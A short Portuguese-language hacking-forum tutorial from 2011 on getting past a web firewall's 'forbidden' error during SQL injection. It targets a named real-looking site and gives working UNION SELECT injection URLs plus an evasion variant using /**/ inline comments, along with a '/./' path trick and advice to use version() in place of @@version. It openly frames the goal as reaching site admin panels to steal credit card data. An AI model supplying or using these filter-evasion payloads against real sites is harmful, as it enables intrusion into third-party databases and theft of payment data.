Burlando o erro forbidden com SQLI

10/09/2011 08:29

olá, pessoal neste tutorial eu vou mostrar como burlar o chato erro 'forbidden' ja penso vc fazendo seus scan acha um site vulneravel ai vc coloca no havij e derrepente vem o famoso erro forbidden ai vc perde todo o admin de cc's que vc queria pegar rsrrssrssss..(...) ....continuando, agora eu vou mostrar como é facil burlar esse erro que nem o havij conseguil burlar :*
-
-
veja o erro forbidden:
-
shogansystems*com/product_content*php?id=-124%20union%20all%20select%201,2,3,4,5,6,7,8,9--



Agora vamos vêr como podemos burlar esse erro... Acho que alguns sabem que “/../” faz com que se volte um diretório, e que “/./” não faz nada a não ser continuar no diretório atual. Bom, alguns servidores restringem o acesso a uma URL especifica, ou seja, ele restringe www . exemplo . com . br/secret/passwords .txt, mas não restringe o acesso a URL www*exemplo*com*br/./secret/passwords.txt, por que a segunda URL é diferente, mas vai apontar para o mesmo lugar, dando assim acesso ao arquivo, bastou usar o “/./” e o servidor foi enganado. Com 'SQLI' não é tão diferente..



-
http://www.shogansystems.com/product_contentphp?id=-124 union all select 1,2,3,4,5,6,7,8,9-- <<~ com erro forbidden !
-
-
http://www.shogansystems.com/product_content.php?id=-124+/**/+union/**/+select/**/+1,2,3,4,5,6,7,8,9-- <<~ Burlando erro forbidden !!
-
-
ao inveis de vc usar um simples: union all select 1,2,3,4,5,6,7,8,9-- vc usa assim +/**/union/**/+select/**/1,2,3,4....
basta separar os espaços vagos com +/**/ e assim sucessivamente..
-
outra dica tambem é não usar o comando @@version use o version()





é isso ai simples assim de resolver um erro que nem o havij consegue burlar.... [ ]'s

 

HACKERS ATIVOS COMENTA LAH